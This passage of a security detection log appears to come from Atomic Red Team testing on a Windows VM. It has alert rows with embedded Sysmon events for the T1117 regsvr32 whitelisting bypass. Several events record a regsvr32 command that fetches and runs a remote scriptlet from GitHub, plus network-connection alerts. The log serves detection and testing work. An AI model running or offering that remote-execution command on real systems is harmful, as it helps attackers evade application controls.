<EventRecordID>4045</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ProcessId"">5828</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
</TimeCreated>
<EventRecordID>4045</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ProcessId"">5828</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
</TimeCreated>
<EventRecordID>4045</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ProcessId"">5828</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
</TimeCreated>
<EventRecordID>4044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
<Data Name=""ProcessId"">3564</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
</TimeCreated>
<EventRecordID>4044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
<Data Name=""ProcessId"">3564</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
</TimeCreated>
<EventRecordID>4044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
<Data Name=""ProcessId"">3564</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.589404Z"">
</TimeCreated>
<EventRecordID>4043</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3400"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-19 14:53:40.896</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49728</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.565529Z"">
</TimeCreated>
<EventRecordID>4042</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.405</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001089BD3800</Data>
<Data Name=""ProcessId"">7148</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.204886Z"">
</TimeCreated>
<EventRecordID>4041</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.135</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00105DA83800</Data>
<Data Name=""ProcessId"">4336</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ParentProcessId"">2076</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
</TimeCreated>
<EventRecordID>4038</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ParentProcessId"">2832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
</TimeCreated>
<EventRecordID>4038</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
